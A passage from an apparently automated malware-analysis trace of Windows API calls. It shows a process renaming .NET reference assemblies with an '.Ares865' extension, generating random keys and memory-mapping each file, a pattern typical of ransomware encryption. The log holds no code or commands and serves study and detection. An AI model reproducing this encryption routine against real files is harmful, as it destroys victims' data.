(lpString1="System.Runtime.Serialization.dll", lpString2=".ini") returned 1 [0124.980] lstrlenW (lpString=".sys") returned 4 [0124.980] lstrcmpiW (lpString1="System.Runtime.Serialization.dll", lpString2=".sys") returned 1 [0124.980] lstrlenW (lpString="System.Runtime.Serialization.dll") returned 32 [0124.980] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll.Ares865") returned 109 [0124.981] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.runtime.serialization.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.runtime.serialization.dll.ares865"), dwFlags=0x1) returned 1 [0124.982] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.runtime.serialization.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.983] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=970752) returned 1 [0124.983] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.984] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.984] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.984] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xed300, lpName=0x0) returned 0x170 [0124.985] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xed300) returned 0xdd0000 [0125.023] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.024] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.024] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.037] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.ServiceModel.dll" | out: lpString1="System.ServiceModel.dll") returned="System.ServiceModel.dll" [0125.037] lstrlenW (lpString="System.ServiceModel.dll") returned 23 [0125.037] lstrlenW (lpString="Ares865") returned 7 [0125.037] lstrcmpiW (lpString1="del.dll", lpString2="Ares865") returned 1 [0125.037] lstrlenW (lpString=".dll") returned 4 [0125.037] lstrcmpiW (lpString1="System.ServiceModel.dll", lpString2=".dll") returned 1 [0125.037] lstrlenW (lpString=".lnk") returned 4 [0125.037] lstrcmpiW (lpString1="System.ServiceModel.dll", lpString2=".lnk") returned 1 [0125.038] lstrlenW (lpString=".ini") returned 4 [0125.038] lstrcmpiW (lpString1="System.ServiceModel.dll", lpString2=".ini") returned 1 [0125.038] lstrlenW (lpString=".sys") returned 4 [0125.038] lstrcmpiW (lpString1="System.ServiceModel.dll", lpString2=".sys") returned 1 [0125.038] lstrlenW (lpString="System.ServiceModel.dll") returned 23 [0125.038] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll.Ares865") returned 100 [0125.038] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.servicemodel.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.servicemodel.dll.ares865"), dwFlags=0x1) returned 1 [0125.040] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.servicemodel.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.041] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5988352) returned 1 [0125.041] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.042] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.042] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.042] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5b6300, lpName=0x0) returned 0x170 [0125.043] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x1b6300) returned 0x3030000 [0125.207] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.208] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.208] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.233] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Speech.dll" | out: lpString1="System.Speech.dll") returned="System.Speech.dll" [0125.233] lstrlenW (lpString="System.Speech.dll") returned 17 [0125.233] lstrlenW (lpString="Ares865") returned 7 [0125.233] lstrcmpiW (lpString1="ech.dll", lpString2="Ares865") returned 1 [0125.233] lstrlenW (lpString=".dll") returned 4 [0125.233] lstrcmpiW (lpString1="System.Speech.dll", lpString2=".dll") returned 1 [0125.234] lstrlenW (lpString=".lnk") returned 4 [0125.234] lstrcmpiW (lpString1="System.Speech.dll", lpString2=".lnk") returned 1 [0125.234] lstrlenW (lpString=".ini") returned 4 [0125.234] lstrcmpiW (lpString1="System.Speech.dll", lpString2=".ini") returned 1 [0125.234] lstrlenW (lpString=".sys") returned 4 [0125.234] lstrcmpiW (lpString1="System.Speech.dll", lpString2=".sys") returned 1 [0125.234] lstrlenW (lpString="System.Speech.dll") returned 17 [0125.234] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll.Ares865") returned 94 [0125.234] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.speech.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.speech.dll.ares865"), dwFlags=0x1) returned 1 [0125.237] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.speech.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.237] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=688128) returned 1 [0125.237] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.238] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.238] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.238] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa8300, lpName=0x0) returned 0x170 [0125.240] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa8300) returned 0xdd0000 [0125.266] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.267] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.267] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.277] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Workflow.Activities.dll" | out: lpString1="System.Workflow.Activities.dll") returned="System.Workflow.Activities.dll" [0125.277] lstrlenW (lpString="System.Workflow.Activities.dll") returned 30 [0125.277] lstrlenW (lpString="Ares865") returned 7 [0125.277] lstrcmpiW (lpString1="ies.dll", lpString2="Ares865") returned 1 [0125.277] lstrlenW (lpString=".dll") returned 4 [0125.277] lstrcmpiW (lpString1="System.Workflow.Activities.dll", lpString2=".dll") returned 1 [0125.277] lstrlenW (lpString=".lnk") returned 4 [0125.277] lstrcmpiW (lpString1="System.Workflow.Activities.dll", lpString2=".lnk") returned 1 [0125.277] lstrlenW (lpString=".ini") returned 4 [0125.277] lstrcmpiW (lpString1="System.Workflow.Activities.dll", lpString2=".ini") returned 1 [0125.277] lstrlenW (lpString=".sys") returned 4 [0125.277] lstrcmpiW (lpString1="System.Workflow.Activities.dll", lpString2=".sys") returned 1 [0125.278] lstrlenW (lpString="System.Workflow.Activities.dll") returned 30 [0125.278] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll.Ares865") returned 107 [0125.278] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.activities.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.activities.dll.ares865"), dwFlags=0x1) returned 1 [0125.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.activities.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.282] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1142784) returned 1 [0125.282] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.283] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.283] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.283] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x117300, lpName=0x0) returned 0x170 [0125.285] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x117300) returned 0x3030000 [0125.331] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.332] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.332] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.347] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Workflow.ComponentModel.dll" | out: lpString1="System.Workflow.ComponentModel.dll") returned="System.Workflow.ComponentModel.dll" [0125.347] lstrlenW (lpString="System.Workflow.ComponentModel.dll") returned 34 [0125.347] lstrlenW (lpString="Ares865") returned 7 [0125.347] lstrcmpiW (lpString1="del.dll", lpString2="Ares865") returned 1 [0125.347] lstrlenW (lpString=".dll") returned 4 [0125.347] lstrcmpiW (lpString1="System.Workflow.ComponentModel.dll", lpString2=".dll") returned 1 [0125.348] lstrlenW (lpString=".lnk") returned 4 [0125.348] lstrcmpiW (lpString1="System.Workflow.ComponentModel.dll", lpString2=".lnk") returned 1 [0125.348] lstrlenW (lpString=".ini") returned 4 [0125.348] lstrcmpiW (lpString1="System.Workflow.ComponentModel.dll", lpString2=".ini") returned 1 [0125.348] lstrlenW (lpString=".sys") returned 4 [0125.348] lstrcmpiW (lpString1="System.Workflow.ComponentModel.dll", lpString2=".sys") returned 1 [0125.348] lstrlenW (lpString="System.Workflow.ComponentModel.dll") returned 34 [0125.348] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll.Ares865") returned 111 [0125.348] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.componentmodel.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.componentmodel.dll.ares865"), dwFlags=0x1) returned 1 [0125.350] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.componentmodel.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.351] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1630208) returned 1 [0125.351] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.352] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.352] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.352] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18e300, lpName=0x0) returned 0x170 [0125.356] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18e300) returned 0x3030000 [0125.422] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.423] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.423] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.447] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.Workflow.Runtime.dll" | out: lpString1="System.Workflow.Runtime.dll") returned="System.Workflow.Runtime.dll" [0125.447] lstrlenW (lpString="System.Workflow.Runtime.dll") returned 27 [0125.447] lstrlenW (lpString="Ares865") returned 7 [0125.447] lstrcmpiW (lpString1="ime.dll", lpString2="Ares865") returned 1 [0125.447] lstrlenW (lpString=".dll") returned 4 [0125.447] lstrcmpiW (lpString1="System.Workflow.Runtime.dll", lpString2=".dll") returned 1 [0125.447] lstrlenW (lpString=".lnk") returned 4 [0125.447] lstrcmpiW (lpString1="System.Workflow.Runtime.dll", lpString2=".lnk") returned 1 [0125.447] lstrlenW (lpString=".ini") returned 4 [0125.447] lstrcmpiW (lpString1="System.Workflow.Runtime.dll", lpString2=".ini") returned 1 [0125.447] lstrlenW (lpString=".sys") returned 4 [0125.447] lstrcmpiW (lpString1="System.Workflow.Runtime.dll", lpString2=".sys") returned 1 [0125.447] lstrlenW (lpString="System.Workflow.Runtime.dll") returned 27 [0125.448] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll.Ares865") returned 104 [0125.448] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.runtime.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.runtime.dll.ares865"), dwFlags=0x1) returned 1 [0125.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.runtime.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.451] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=540672) returned 1 [0125.451] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.452] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.452] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.452] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x84300, lpName=0x0) returned 0x170 [0125.454] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x84300) returned 0x420000 [0125.481] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.481] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.482] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.491] lstrcpyW (in: lpString1=0x2cce48a, lpString2="UIAutomationClient.dll" | out: lpString1="UIAutomationClient.dll") returned="UIAutomationClient.dll" [0125.492] lstrlenW (lpString="UIAutomationClient.dll") returned 22 [0125.492] lstrlenW (lpString="Ares865") returned 7 [0125.492] lstrcmpiW (lpString1="ent.dll", lpString2="Ares865") returned 1 [0125.492] lstrlenW (lpString=".dll") returned 4 [0125.492] lstrcmpiW (lpString1="UIAutomationClient.dll", lpString2=".dll") returned 1 [0125.492] lstrlenW (lpString=".lnk") returned 4 [0125.492] lstrcmpiW (lpString1="UIAutomationClient.dll", lpString2=".lnk") returned 1 [0125.492] lstrlenW (lpString=".ini") returned 4 [0125.492] lstrcmpiW (lpString1="UIAutomationClient.dll", lpString2=".ini") returned 1 [0125.492] lstrlenW (lpString=".sys") returned 4 [0125.492] lstrcmpiW (lpString1="UIAutomationClient.dll", lpString2=".sys") returned 1 [0125.492] lstrlenW (lpString="UIAutomationClient.dll") returned 22 [0125.492] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll.Ares865") returned 99 [0125.492] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclient.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclient.dll.ares865"), dwFlags=0x1) returned 1 [0125.495] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclient.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.495] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=172032) returned 1 [0125.495] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.496] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.496] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.496] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2a300, lpName=0x0) returned 0x170 [0125.498] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2a300) returned 0x420000 [0125.506] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.507] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.507] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.510] lstrcpyW (in: lpString1=0x2cce48a, lpString2="UIAutomationClientsideProviders.dll" | out: lpString1="UIAutomationClientsideProviders.dll") returned="UIAutomationClientsideProviders.dll" [0125.510] lstrlenW (lpString="UIAutomationClientsideProviders.dll") returned 35 [0125.510] lstrlenW (lpString="Ares865") returned 7 [0125.510] lstrcmpiW (lpString1="ers.dll", lpString2="Ares865") returned 1 [0125.510] lstrlenW (lpString=".dll") returned 4 [0125.510] lstrcmpiW (lpString1="UIAutomationClientsideProviders.dll", lpString2=".dll") returned 1 [0125.510] lstrlenW (lpString=".lnk") returned 4 [0125.510] lstrcmpiW (lpString1="UIAutomationClientsideProviders.dll", lpString2=".lnk") returned 1 [0125.510] lstrlenW (lpString=".ini") returned 4 [0125.510] lstrcmpiW (lpString1="UIAutomationClientsideProviders.dll", lpString2=".ini") returned 1 [0125.510] lstrlenW (lpString=".sys") returned 4 [0125.510] lstrcmpiW (lpString1="UIAutomationClientsideProviders.dll", lpString2=".sys") returned 1 [0125.510] lstrlenW (lpString="UIAutomationClientsideProviders.dll") returned 35 [0125.510] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll.Ares865") returned 112 [0125.510] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclientsideproviders.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclientsideproviders.dll.ares865"), dwFlags=0x1) returned 1 [0125.550] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclientsideproviders.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.551] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=380928) returned 1 [0125.551] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.552] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.552] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.552] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5d300, lpName=0x0) returned 0x170 [0125.555] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5d300) returned 0x420000 [0125.633] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.634] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.634] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.640] lstrcpyW (in: lpString1=0x2cce48a, lpString2="UIAutomationProvider.dll" | out: lpString1="UIAutomationProvider.dll") returned="UIAutomationProvider.dll" [0125.640] lstrlenW (lpString="UIAutomationProvider.dll") returned 24 [0125.640] lstrlenW (lpString="Ares865") returned 7 [0125.640] lstrcmpiW (lpString1="der.dll", lpString2="Ares865") returned 1 [0125.640] lstrlenW (lpString=".dll") returned 4 [0125.640] lstrcmpiW (lpString1="UIAutomationProvider.dll", lpString2=".dll") returned 1 [0125.640] lstrlenW (lpString=".lnk") returned 4 [0125.640] lstrcmpiW (lpString1="UIAutomationProvider.dll", lpString2=".lnk") returned 1 [0125.640] lstrlenW (lpString=".ini") returned 4 [0125.640] lstrcmpiW (lpString1="UIAutomationProvider.dll", lpString2=".ini") returned 1 [0125.640] lstrlenW (lpString=".sys") returned 4 [0125.640] lstrcmpiW (lpString1="UIAutomationProvider.dll", lpString2=".sys") returned 1 [0125.640] lstrlenW (lpString="UIAutomationProvider.dll") returned 24 [0125.641] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference 